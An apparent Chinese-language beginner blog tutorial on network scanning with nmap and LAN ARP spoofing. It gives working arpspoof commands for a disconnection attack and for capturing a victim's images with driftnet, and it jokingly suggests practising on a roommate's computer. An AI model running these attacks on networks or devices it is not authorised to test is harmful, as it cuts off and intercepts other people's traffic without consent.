【无线安全实践入门】网络扫描和ARP欺骗

时间:2022-06-01 18:31:58
文中可能存在错误操作或错误理解,望大家不吝指正.
同时也希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.

!阅前须知!

本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.

本文中的工具可能已经过时,或使用方法已经改变了,感兴趣可以深入查阅资料

(但是我还是列出以前的使用方法供大家借鉴).

ps.若对无线攻击手段WiFi破解感兴趣可以参考以下两篇文章

【无线安全实践入门】基础攻击手段与常用工具简介

【无线安全实践入门】破解WiFi密码的多个方法

ps.本文环境在Kali下,学习最好具备一点linux基础知识.

1.网络扫描和嗅探

NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包

--NMap真的很常用,简直神器
--列出几种简单的使用方法: --ping扫描,快速,不过回显的内容有限
> nmap -sP (网关IP)/(子网掩码) --SYN/半开放扫描,加上-A回显详细信息
> nmap -sS [-A] (网关IP)/(子网掩码) --单个扫描,显示详细内容
> nmap -A (目标IP) --示例
> nmap -sP 192.168.1.1/24

2.ARP欺骗

局域网中的ARP欺骗还是比较有意思的.像arpspoofEttercap等工具都很不错.

arp欺骗之后其实可以很多动作的...

这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.

ps.有条件的话,可以拿手机或者室友电脑练手(doge脸).

--首先,在局域网环境中配合NMap工具使用,取得目标IP
> nmap -sP (网关IP)/(子网掩码)

2.1.断网攻击

ps.修改ip_forward的值,是为了开启IP转发,其值为'0'时候则禁止转发,目标主机断网.

--修改ip_forward(默认为'0')
--可以提前cat查看一下,若是回显'0',则可以跳过本步
> echo 0 > /proc/sys/net/ipv4/ip_forward --开始arp欺骗
> arpspoof -i (你的网卡名称) -t (目标IP) (网关IP) --使用目标主机上网测试,观察命令行回显.

2.2.图片捕获

--修改ip_forward(默认为'0')
--可以提前cat查看一下,若是回显'1',则可以跳过本步
> echo 1 > /proc/sys/net/ipv4/ip_forward --开始arp欺骗(本机网卡名,可以用ifconfig来查看)
> arpspoof -i (本机网卡名) -t (目标IP) (网关IP) --另外再开一终端,开始抓取图片
> drifnet -i (本机网卡名) --使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.

常见的网络协议是网络安全中的基础,能让你能够更快吸收了解技术细节.

加油,共勉